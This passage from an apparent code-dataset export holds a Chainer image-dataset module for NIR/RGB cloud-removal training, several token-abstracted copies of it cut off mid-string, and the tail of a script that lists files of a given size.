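                if os.stat(path).st_size == target_size:
                    yield path
            except OSError:
                continue  # unreadable or vanished files are skipped

if __name__ == '__main__':
    with open('output7.txt', 'w', encoding='utf-8') as output:
        for match in find_files_by_size('c:\\', 3010349):
            print(match, file=output)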
99,893 | eb4a1a09cead833c07869020bc40b0c9be4704ed | import os
import sys
import numpy as np
import cv2
import random
import glob
import chainer
def read_imlist(root_dir, txt_imlist):
with open(txt_imlist, 'r') as f:
ret = [os.path.join(root_dir, path.strip()) for path in f.readlines()]
return ret
def train_test_dataset(train_class_name, args_train, test_class_name, args_test):
mod_name = os.path.splitext(os.path.basename(__file__))[0]
mod_path = os.path.dirname(__file__)
sys.path.insert(0, mod_path)
train_class = getattr(__import__(mod_name), train_class_name)
test_class = getattr(__import__(mod_name), test_class_name)
train = train_class(**args_train)
test = test_class(**args_test)
return train, test
class TestNIRRGB(chainer.dataset.DatasetMixin):
def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb):
super().__init__()
self.nir = read_imlist(dir_nir, imlist_nir)
self.rgb = read_imlist(dir_rgb, imlist_rgb)
def __len__(self):
return len(self.rgb)
def get_example(self, i):
nir = cv2.imread(self.nir[i], 0).astype(np.float32)
rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)
nirrgb = np.concatenate((nir[:, :, None], rgb), axis=2)
nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.
return nirrgb,
class TestNIR(chainer.dataset.DatasetMixin):
def __init__(self, dir_nir, imlist_nir):
super().__init__()
self.nir = read_imlist(dir_nir, imlist_nir)
def __len__(self):
return len(self.nir)
def get_example(self, i):
nir = cv2.imread(self.nir[i], 0).astype(np.float32)
nir = nir[None, :, :] / 127.5 - 1.
return nir,
class TestRGB(chainer.dataset.DatasetMixin):
def __init__(self, dir_rgb, imlist_rgb):
super().__init__()
self.rgb = read_imlist(dir_rgb, imlist_rgb)
def __len__(self):
return len(self.rgb)
def get_example(self, i):
rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)
rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.
return rgb,
class BaseTrain(chainer.dataset.DatasetMixin):
def __init__(self):
super().__init__()
def transform(self, x, y):
c, h, w = x.shape
if self.augmentation:
top = random.randint(0, h - self.size - 1)
left = random.randint(0, w - self.size - 1)
if random.randint(0, 1):
x = x[:, :, ::-1]
y = y[:, :, ::-1]
else:
top = (h - self.size) // 2
left = (w - self.size) // 2
bottom = top + self.size
right = left + self.size
x = x[:, top:bottom, left:right]
y = y[:, top:bottom, left:right]
return x, y
class NIRRGB2RGBCLOUD(BaseTrain):
def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb, *args, **kwargs):
super().__init__()
self.nir = read_imlist(dir_nir, imlist_nir)
self.rgb = read_imlist(dir_rgb, imlist_rgb)
self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))
self.size = kwargs.pop('size')
self.augmentation = kwargs.pop('augmentation')
def __len__(self):
return len(self.rgb)
def get_example(self, i):
nir = cv2.imread(self.nir[i], 0).astype(np.float32)
rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)
cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)
alpha = cloud[:, :, 3] / 255.
alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))
clouded_rgb = (1. - alpha) * rgb + alpha * cloud[:, :, :3]
clouded_rgb = np.clip(clouded_rgb, 0., 255.)
nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)
cloud = cloud[:, :, 3]
rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)
nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.
rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.
nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)
return nirrgb, rgbcloud
class RGB2RGBCLOUD(BaseTrain):
def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):
super().__init__()
self.rgb = read_imlist(dir_rgb, imlist_rgb)
self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))
self.size = kwargs.pop('size')
self.augmentation = kwargs.pop('augmentation')
def __len__(self):
return len(self.rgb)
def get_example(self, i):
rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)
cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)
alpha = cloud[:, :, 3] / 255.
alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))
clouded_rgb = (1. - alpha) * rgb + alpha * cloud[:, :, :3]
clouded_rgb = np.clip(clouded_rgb, 0., 255.)
cloud = cloud[:, :, 3]
rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)
rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.
rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.
rgb, rgbcloud = self.transform(rgb, rgbcloud)
return rgb, rgbcloud
class NIR2RGB(BaseTrain):
def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **kwargs):
super().__init__()
self.nir = read_imlist(dir_nir, imlist_nir)
self.rgb = read_imlist(dir_rgb, imlist_rgb)
self.size = kwargs.pop('size')
self.augmentation = kwargs.pop('augmentation')
def __len__(self):
return len(self.rgb)
def get_example(self, i):
nir = cv2.imread(self.nir[i], 0).astype(np.float32)
rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)
nir = nir[None, :, :] / 127.5 - 1.
rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.
nir, rgb = self.transform(nir, rgb)
return nir, rgb
| [
"import os\nimport sys\nimport numpy as np\nimport cv2\nimport random\nimport glob\n\nimport chainer\n\n\ndef read_imlist(root_dir, txt_imlist):\n with open(txt_imlist, 'r') as f:\n ret = [os.path.join(root_dir, path.strip()) for path in f.readlines()]\n return ret\n\n\ndef train_test_dataset(train_class_name, args_train, test_class_name, args_test):\n mod_name = os.path.splitext(os.path.basename(__file__))[0]\n mod_path = os.path.dirname(__file__)\n sys.path.insert(0, mod_path)\n train_class = getattr(__import__(mod_name), train_class_name)\n test_class = getattr(__import__(mod_name), test_class_name)\n train = train_class(**args_train)\n test = test_class(**args_test)\n\n return train, test\n\n\nclass TestNIRRGB(chainer.dataset.DatasetMixin):\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n\n nirrgb = np.concatenate((nir[:, :, None], rgb), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.\n\n return nirrgb,\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.\n\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.\n\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n\n alpha = cloud[:, :, 3] / 255.\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1. 
- alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0., 255.)\n\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.\n\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n\n alpha = cloud[:, :, 3] / 255.\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1. - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0., 255.)\n\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.\n\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n\n nir = nir[None, :, :] / 127.5 - 1.\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.\n\n nir, rgb = self.transform(nir, rgb)\n\n return nir, rgb\n",
"import os\nimport sys\nimport numpy as np\nimport cv2\nimport random\nimport glob\nimport chainer\n\n\ndef read_imlist(root_dir, txt_imlist):\n with open(txt_imlist, 'r') as f:\n ret = [os.path.join(root_dir, path.strip()) for path in f.readlines()]\n return ret\n\n\ndef train_test_dataset(train_class_name, args_train, test_class_name, args_test\n ):\n mod_name = os.path.splitext(os.path.basename(__file__))[0]\n mod_path = os.path.dirname(__file__)\n sys.path.insert(0, mod_path)\n train_class = getattr(__import__(mod_name), train_class_name)\n test_class = getattr(__import__(mod_name), test_class_name)\n train = train_class(**args_train)\n test = test_class(**args_test)\n return train, test\n\n\nclass TestNIRRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nirrgb = np.concatenate((nir[:, :, None], rgb), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n return nirrgb,\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = 
rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n\n\ndef read_imlist(root_dir, txt_imlist):\n with open(txt_imlist, 'r') as f:\n ret = [os.path.join(root_dir, path.strip()) for path in f.readlines()]\n return ret\n\n\ndef train_test_dataset(train_class_name, args_train, test_class_name, args_test\n ):\n mod_name = os.path.splitext(os.path.basename(__file__))[0]\n mod_path = os.path.dirname(__file__)\n sys.path.insert(0, mod_path)\n train_class = getattr(__import__(mod_name), train_class_name)\n test_class = getattr(__import__(mod_name), test_class_name)\n train = train_class(**args_train)\n test = test_class(**args_test)\n return train, test\n\n\nclass TestNIRRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nirrgb = np.concatenate((nir[:, :, None], rgb), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n return nirrgb,\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, 
rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n\n\ndef train_test_dataset(train_class_name, args_train, test_class_name, args_test\n ):\n mod_name = os.path.splitext(os.path.basename(__file__))[0]\n mod_path = os.path.dirname(__file__)\n sys.path.insert(0, mod_path)\n train_class = getattr(__import__(mod_name), train_class_name)\n test_class = getattr(__import__(mod_name), test_class_name)\n train = train_class(**args_train)\n test = test_class(**args_test)\n return train, test\n\n\nclass TestNIRRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nirrgb = np.concatenate((nir[:, :, None], rgb), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n return nirrgb,\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n return rgb,\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n 
super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n\n\nclass TestNIRRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nirrgb = np.concatenate((nir[:, :, None], rgb), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n return nirrgb,\n\n\nclass TestNIR(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_nir, imlist_nir):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n\n def __len__(self):\n return len(self.nir)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n return nir,\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n\n def __init__(self, dir_rgb, imlist_rgb):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = 